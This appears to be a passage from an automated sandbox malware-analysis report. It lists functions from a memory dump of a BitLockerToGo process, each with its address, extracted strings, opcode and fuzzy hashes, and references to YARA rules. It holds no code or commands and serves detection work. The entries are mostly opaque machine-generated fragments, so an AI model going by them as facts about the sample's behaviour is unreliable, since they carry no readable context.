                                                                                                                                                          • API String ID: 0-1447521219
                                                                                                                                                          • Opcode ID: d274aa0dd75284b3dc8c770fe66cb4b3dcf621b6fe640311d105ab0291ab6262
                                                                                                                                                          • Instruction ID: 514f13634d9d390dc9dfcddb367d916e8938e7c246aef56a26b897fe237e3f6f
                                                                                                                                                          • Opcode Fuzzy Hash: d274aa0dd75284b3dc8c770fe66cb4b3dcf621b6fe640311d105ab0291ab6262
                                                                                                                                                          • Instruction Fuzzy Hash: E742F035A59301CFD708CF28E89026AB3E1FB8A315F09897EE58687762D735EC45CB45
                                                                                                                                                          Function 004316CE Relevance: 5.8, Strings: 4, Instructions: 824COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: *XJ{$>T\Z$])$aff{
                                                                                                                                                          • API String ID: 0-2222276473
                                                                                                                                                          • Opcode ID: 8ed444fac277c25db64a3c47ba10bfddbb1231e036786dedd629cc3a06cf1c87
                                                                                                                                                          • Instruction ID: 208e91640e2c0379ccfad83609a9321a0cf82edc80dee516d183bf74cf9772c2
                                                                                                                                                          • Opcode Fuzzy Hash: 8ed444fac277c25db64a3c47ba10bfddbb1231e036786dedd629cc3a06cf1c87
                                                                                                                                                          • Instruction Fuzzy Hash: B352E270604B818FD725CF35C4907A3BBE1AF57354F189A5EC0EA8B792C778A40ACB65
                                                                                                                                                          Function 00428770 Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 557COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DrivesLogical
                                                                                                                                                          • String ID: P_$x{
                                                                                                                                                          • API String ID: 999431828-1915392596
                                                                                                                                                          • Opcode ID: 0f78e3c788b37d7698a2c418f735874c4554113e012fd32b90fcf422649e7e0e
                                                                                                                                                          • Instruction ID: 28550b524e20fd6019708488fec728c1a1e00781098e71f607dd82103f106617
                                                                                                                                                          • Opcode Fuzzy Hash: 0f78e3c788b37d7698a2c418f735874c4554113e012fd32b90fcf422649e7e0e
                                                                                                                                                          • Instruction Fuzzy Hash: 5202B9B46083408FE3109F25D89276FBBE1EF92314F50892DF4D58B3A5D779880ACB96
                                                                                                                                                          Function 004453F0 Relevance: 5.8, Strings: 4, Instructions: 768COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: "^D$R^D$rTD$WD
                                                                                                                                                          • API String ID: 0-1447521219
                                                                                                                                                          • Opcode ID: d42dc95c6450376a90c4fb5beb59cb56e2ee08a1461ea882bd9582f7a6b49ef5
                                                                                                                                                          • Instruction ID: 4edd658ed11fb6b0a462d7d70b0944146771da76dc5a671dfe6337bc9ceae043
                                                                                                                                                          • Opcode Fuzzy Hash: d42dc95c6450376a90c4fb5beb59cb56e2ee08a1461ea882bd9582f7a6b49ef5
                                                                                                                                                          • Instruction Fuzzy Hash: 7432FE35A59301CFC708CF28E89026AB7E2FB8A315F09897DD58687762D734E845CB85
                                                                                                                                                          Function 004320A3 Relevance: 5.7, Strings: 4, Instructions: 651COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: V24"$_jlm$g^\\$gav`
                                                                                                                                                          • API String ID: 0-168531910
                                                                                                                                                          • Opcode ID: 7efd46db49a120c4ec6a0f4fd16e04d42ff24d1528cdc7f0a015b8535ce3eacf
                                                                                                                                                          • Instruction ID: 62e1cc47b6546c04e873f0fa59edd9078f3fb9312850b668d426b2bb13264185
                                                                                                                                                          • Opcode Fuzzy Hash: 7efd46db49a120c4ec6a0f4fd16e04d42ff24d1528cdc7f0a015b8535ce3eacf
                                                                                                                                                          • Instruction Fuzzy Hash: 00121975604B818FD72ACF35C5517A3BBE2AF97304F0899AEC0EB8B382C77965058B15
                                                                                                                                                          Function 0042C8DA Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 142COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Q@g`$7#v
                                                                                                                                                          • API String ID: 0-593499481
                                                                                                                                                          • Opcode ID: 3ab620c9d14432ba8d622c46299225c9c361d89d5f9fde95cc5cbf9eaacbad13
                                                                                                                                                          • Instruction ID: eae350f86fd92dff23fe4261f9e26cd0abfbdae7ba8eea48a10bab641a56ca95
                                                                                                                                                          • Opcode Fuzzy Hash: 3ab620c9d14432ba8d622c46299225c9c361d89d5f9fde95cc5cbf9eaacbad13
                                                                                                                                                          • Instruction Fuzzy Hash: 8C51E1B4508344EFE3209F26E84971BBBE0FB85704F54096CF1849B2A2DB75C915CB9B
                                                                                                                                                          Function 0040D8C0 Relevance: 5.4, Strings: 4, Instructions: 358COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: C4C798787793A87B05133B3AEA4D70B5$D$T$pq
                                                                                                                                                          • API String ID: 0-1022955868
                                                                                                                                                          • Opcode ID: 01be8b5697bc29943e35b2126dbe9babd9bd8b49c44cda6edb2dd2f02762c4ad
                                                                                                                                                          • Instruction ID: 517c0696a7e9e4e5b8c99c4f33dfe11682e2c86f1bfa69376ea61f303c213b19
                                                                                                                                                          • Opcode Fuzzy Hash: 01be8b5697bc29943e35b2126dbe9babd9bd8b49c44cda6edb2dd2f02762c4ad
                                                                                                                                                          • Instruction Fuzzy Hash: 0EC1DDB16083809FE710DF65D88175BBBE2EBC1318F14892DE1C45B396DA79C90ACB97
                                                                                                                                                          Function 004455B0 Relevance: 4.5, Strings: 3, Instructions: 701COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: "^D$R^D$WD
                                                                                                                                                          • API String ID: 0-3205647164
                                                                                                                                                          • Opcode ID: 8b7cc2a2e53bcceb4c2a3eb9a7888184378234fdb424fe3499ae0582bde59b9a
                                                                                                                                                          • Instruction ID: 0696c2488c5ca6b57e4adc92f154419c249bd2d34664475ee3d6fea8f40925b7
                                                                                                                                                          • Opcode Fuzzy Hash: 8b7cc2a2e53bcceb4c2a3eb9a7888184378234fdb424fe3499ae0582bde59b9a
                                                                                                                                                          • Instruction Fuzzy Hash: D8221235A58301CFC708CF28E89026AB7E1FB8A315F0A897DE58697762D735ED05CB85
                                                                                                                                                          Function 00445700 Relevance: 4.4, Strings: 3, Instructions: 616COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: "^D$R^D$WD
                                                                                                                                                          • API String ID: 0-3205647164
                                                                                                                                                          • Opcode ID: a13477920f28b1a93bbc2901630dcd68ef9eae181b0061a2bb059a32776e237c
                                                                                                                                                          • Instruction ID: c50f4b9ef1da2f0807c24ad3b0b91a3b6f2f21fb147daf9840c3410c5866b885
                                                                                                                                                          • Opcode Fuzzy Hash: a13477920f28b1a93bbc2901630dcd68ef9eae181b0061a2bb059a32776e237c
                                                                                                                                                          • Instruction Fuzzy Hash: 4D121F35A48311CFC708CF28E89026AB7E1FB8A315F09897DE58687762D735EC05CB85
                                                                                                                                                          Function 0042BAF1 Relevance: 4.3, Strings: 3, Instructions: 546COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: <=$)$Ih
                                                                                                                                                          • API String ID: 0-923205112
                                                                                                                                                          • Opcode ID: 35fd20348a1dd27bc99ff049cc84a22211eeaf5724c4d97ef0ba8783b0f53062
                                                                                                                                                          • Instruction ID: ec44906b19ad4da6e9a6f0bd531f0fea44dffed89277c4993fffa699f926e00e
                                                                                                                                                          • Opcode Fuzzy Hash: 35fd20348a1dd27bc99ff049cc84a22211eeaf5724c4d97ef0ba8783b0f53062
                                                                                                                                                          • Instruction Fuzzy Hash: AFF122B56083518FC710CF25E88166BBBE1EFC6318F18496EE4C597352D738D906CB9A
                                                                                                                                                          Function 00423510 Relevance: 4.2, Strings: 3, Instructions: 453COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: NPFN$Yber$w
                                                                                                                                                          • API String ID: 0-2009834778
                                                                                                                                                          • Opcode ID: 64fcf61c3eab2ac62917519099837caa9742a976a3b72850531310f8be90e581
                                                                                                                                                          • Instruction ID: f2473f649ac28b7ac5100233745bfc677a32be3c71aa57b4bc4a7e66f2bde467
                                                                                                                                                          • Opcode Fuzzy Hash: 64fcf61c3eab2ac62917519099837caa9742a976a3b72850531310f8be90e581
                                                                                                                                                          • Instruction Fuzzy Hash: 29E105B1608311ABE310DF25E985BAFBBE49FD5704F08892EF48497342D27CD9098B97
                                                                                                                                                          Function 00420233 Relevance: 4.2, Strings: 3, Instructions: 435COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: %*+($%*+($R
                                                                                                                                                          • API String ID: 0-1007039563
                                                                                                                                                          • Opcode ID: 50d9abc196ebc805b70afce74f0d98b33782c669f9f8999f32ba545dbf9c160e
                                                                                                                                                          • Instruction ID: 205155558aef97fb9396dc666e5d92773df8099353d7b8a895f335af7ca77af6
                                                                                                                                                          • Opcode Fuzzy Hash: 50d9abc196ebc805b70afce74f0d98b33782c669f9f8999f32ba545dbf9c160e
                                                                                                                                                          • Instruction Fuzzy Hash: 41E113B5A08351DBD720CF28E89176BB7E2EFC5304F04492EE48997392E7399905CB5B
                                                                                                                                                          Function 0040D4D0 Relevance: 4.1, Strings: 3, Instructions: 317COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: + 47$.$'|H
                                                                                                                                                          • API String ID: 0-109567950
                                                                                                                                                          • Opcode ID: 54ebea9f41e9dbb84324b087273c464a07e3396ba849ab18214a3e9178a1a45c
                                                                                                                                                          • Instruction ID: f8e3e953a9217c10a9839241211983a977d4e12bfebe2aa0d84b586b953b1d18
                                                                                                                                                          • Opcode Fuzzy Hash: 54ebea9f41e9dbb84324b087273c464a07e3396ba849ab18214a3e9178a1a45c
                                                                                                                                                          • Instruction Fuzzy Hash: 0AA1147151C3918FD3158F69885035BBFE1EF96314F1889ADE8D5AB382C778C80ACB96
                                                                                                                                                          Function 004457F0 Relevance: 3.1, Strings: 2, Instructions: 644COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: "^D$R^D
                                                                                                                                                          • API String ID: 0-1264080673
                                                                                                                                                          • Opcode ID: a7627bc763e033811ccceba1700b6cdae4df90b2c12e0f392d8f70ce570f4c08
                                                                                                                                                          • Instruction ID: 1136aa216af1708bd5e7ac3c2105f083492f8b8884b55e097f0bdf90e05bd8a2
                                                                                                                                                          • Opcode Fuzzy Hash: a7627bc763e033811ccceba1700b6cdae4df90b2c12e0f392d8f70ce570f4c08
                                                                                                                                                          • Instruction Fuzzy Hash: 22121231A4D711CFC708CF28D89022BB7E1AB8A315F09897EE996973A2D735DD05CB85
                                                                                                                                                          Function 00422C00 Relevance: 3.1, Strings: 2, Instructions: 593COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID: %*+($%*+(
                                                                                                                                                          • API String ID: 2994545307-3039692684
                                                                                                                                                          • Opcode ID: c0c64b1f1a311242f5653ae87034764490023d811ee37297f05c80f2601e4e2f
                                                                                                                                                          • Instruction ID: 9a901c5f20026a95bd5ae1955f9fe8ffa6bb61317b861144ead10e03cf640322
                                                                                                                                                          • Opcode Fuzzy Hash: c0c64b1f1a311242f5653ae87034764490023d811ee37297f05c80f2601e4e2f
                                                                                                                                                          • Instruction Fuzzy Hash: 2E12EE702083519BE730CF11E941BABB7E2FFC4704F54892EE9889B381E7799A11CB56
                                                                                                                                                          Function 004410E0 Relevance: 3.1, Strings: 2, Instructions: 565COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID: %*+($f
                                                                                                                                                          • API String ID: 2994545307-2038831151
                                                                                                                                                          • Opcode ID: 746ed23d42f8412eec14e121527f0b6645729a6c7ec15f61b61d189d19f0d772
                                                                                                                                                          • Instruction ID: bbe19a3e0424d8b70ccf8ee145bad369b6ca6082c8c4d76f0690efdb10af642a
                                                                                                                                                          • Opcode Fuzzy Hash: 746ed23d42f8412eec14e121527f0b6645729a6c7ec15f61b61d189d19f0d772
                                                                                                                                                          • Instruction Fuzzy Hash: 0612DF706083419FE714CF19C880A2BBBE1BFC5354F188A2EF4959B3A1D738D985CB5A
                                                                                                                                                          Function 0042D530 Relevance: 3.0, Strings: 2, Instructions: 506COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: U123$['e!
                                                                                                                                                          • API String ID: 0-1796562098
                                                                                                                                                          • Opcode ID: 29dbcb7a19e30f3bffe5f4f5885afd7c1093793f9ba4b47345690c940fd24b1a
                                                                                                                                                          • Instruction ID: be00c929ed4f84b3f71047f5804ab1182c6649b2f3070cbcbb589a3f153fc8cd
                                                                                                                                                          • Opcode Fuzzy Hash: 29dbcb7a19e30f3bffe5f4f5885afd7c1093793f9ba4b47345690c940fd24b1a
                                                                                                                                                          • Instruction Fuzzy Hash: E5F1DCB4A083518BD710CF24D89176FBBE0EFC5314F14892DE4D99B291E7B8894ACB97
                                                                                                                                                          Function 00432992 Relevance: 2.9, Strings: 2, Instructions: 424COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 7e4g$t(C
                                                                                                                                                          • API String ID: 0-1232948940
                                                                                                                                                          • Opcode ID: 7f5b4d31056eb29012149fd956ad457f27fd3afe1bcf07fbe2cca6404ed376c9
                                                                                                                                                          • Instruction ID: 4c1ef2309330c995e3c6c8c3f68ed2aeade5e18d7e0480b449400f029c070894
                                                                                                                                                          • Opcode Fuzzy Hash: 7f5b4d31056eb29012149fd956ad457f27fd3afe1bcf07fbe2cca6404ed376c9
                                                                                                                                                          • Instruction Fuzzy Hash: 75D1E331604B808AD7258F35C4517A3BBE2AF97304F1899ADC0EB8B786C7BDA506CB55
                                                                                                                                                          Function 00408320 Relevance: 2.9, Strings: 2, Instructions: 392COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: )$IEND
                                                                                                                                                          • API String ID: 0-707183367
                                                                                                                                                          • Opcode ID: 0d4a0272be530b73f78102cc7adcd99c8d67d8d0f05cb094713b4a4384dbdf0e
                                                                                                                                                          • Instruction ID: 1ef04f1398a893fd17dd6de69e0088b79e886ce4696115f4b2a07c4b0d9e9d24
                                                                                                                                                          • Opcode Fuzzy Hash: 0d4a0272be530b73f78102cc7adcd99c8d67d8d0f05cb094713b4a4384dbdf0e
                                                                                                                                                          • Instruction Fuzzy Hash: 20E1AF71A087019FD310DF29C98171BBBE0BB94314F14893EE995A73C2DB79E815CB9A
                                                                                                                                                          Function 00403770 Relevance: 2.9, Strings: 2, Instructions: 389COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Inf$NaN
                                                                                                                                                          • API String ID: 0-3500518849
                                                                                                                                                          • Opcode ID: 3aeb4ff8863a7bdfa305978a2110156c2435a2228975ac24d2cca2a01d9a0dcd
                                                                                                                                                          • Instruction ID: 900752cd4b4fe2f139e423bb8110d9ccfc5e0ce9583a9566b50fe289db1e6927
                                                                                                                                                          • Opcode Fuzzy Hash: 3aeb4ff8863a7bdfa305978a2110156c2435a2228975ac24d2cca2a01d9a0dcd
                                                                                                                                                          • Instruction Fuzzy Hash: F3D1C671A183019BC704CF29C88061BBBE9EBC4754F258E3EF895A73D1E679DD058B86
                                                                                                                                                          Function 00445B20 Relevance: 2.9, Strings: 2, Instructions: 367COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: "^D$R^D
                                                                                                                                                          • API String ID: 0-1264080673
                                                                                                                                                          • Opcode ID: a6ad0a81eb452edef4b4c39c0d90a5f9be2454cd7e5448a7a94f62e79d6ad878
                                                                                                                                                          • Instruction ID: eb9923cd4b94f29ae07c8f18837db219abe2cd36a22395798258ce225348a966
                                                                                                                                                          • Opcode Fuzzy Hash: a6ad0a81eb452edef4b4c39c0d90a5f9be2454cd7e5448a7a94f62e79d6ad878
                                                                                                                                                          • Instruction Fuzzy Hash: D3B10F35A48311CFD709CF28D89036AB7E1FB8A315F49897ED486973A2D735E805CB86
                                                                                                                                                          Function 00435500 Relevance: 2.8, Strings: 2, Instructions: 264COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          • 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 00435617
                                                                                                                                                          • 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899, xrefs: 00435696
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
                                                                                                                                                          • API String ID: 0-2492670020
                                                                                                                                                          • Opcode ID: 3f032653eb93f59891cd92d2f9cf8b43ba3dd62741e93288b22a5db652d260b8
                                                                                                                                                          • Instruction ID: 320c5f61f4139a4da77a7abd9e0d8e8ce1e0a717e261a1249956ac20178eb22d
                                                                                                                                                          • Opcode Fuzzy Hash: 3f032653eb93f59891cd92d2f9cf8b43ba3dd62741e93288b22a5db652d260b8
                                                                                                                                                          • Instruction Fuzzy Hash: CC81373761DE908BD3258A3C4C1137A6A830B97334F3D976BD5F28B3E5DA5D8802934A
                                                                                                                                                          Function 0042E0D7 Relevance: 2.7, Strings: 2, Instructions: 247COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: (+$P7T)
                                                                                                                                                          • API String ID: 0-1314400319
                                                                                                                                                          • Opcode ID: 3f948aaabf7ed0ed0e5774d3e8465603282334fbe704faae138d4129b6d227aa
                                                                                                                                                          • Instruction ID: ac2a0be1deea4b4189643ed0b490d0cde92cb019fbb32b854c621064ada46b43
                                                                                                                                                          • Opcode Fuzzy Hash: 3f948aaabf7ed0ed0e5774d3e8465603282334fbe704faae138d4129b6d227aa
                                                                                                                                                          • Instruction Fuzzy Hash: A661DD716083618BC714CF15E89176BB7E0EF82764F089E1DE8D65B391E3788944CB9A
                                                                                                                                                          Function 00436A90 Relevance: 2.7, Strings: 2, Instructions: 221COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          • 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 00436C2B
                                                                                                                                                          • 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899, xrefs: 00436BA7
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
                                                                                                                                                          • API String ID: 0-2492670020
                                                                                                                                                          • Opcode ID: 8baa32632ae9f8ef22204c4e52aa16c5b2e302a7226f16d59012fb38d860b74d
                                                                                                                                                          • Instruction ID: e59b288758b9919105dd4668c197a6f2b507243c8d739cfa7a834970def23930
                                                                                                                                                          • Opcode Fuzzy Hash: 8baa32632ae9f8ef22204c4e52aa16c5b2e302a7226f16d59012fb38d860b74d
                                                                                                                                                          • Instruction Fuzzy Hash: 1A613B3664959257D318893C4C212BAAA538B97334F3EE36FE5F28B3E0D55D8802921A
                                                                                                                                                          Function 00436D00 Relevance: 2.7, Strings: 2, Instructions: 208COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          • 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 00436E15, 00436F12
                                                                                                                                                          • 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899, xrefs: 00436DD5
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
                                                                                                                                                          • API String ID: 0-2492670020
                                                                                                                                                          • Opcode ID: 7b65f3be6fd35c8e80eb7173b7b53a6dd50b925ad49a31363b71411c5f62ed77
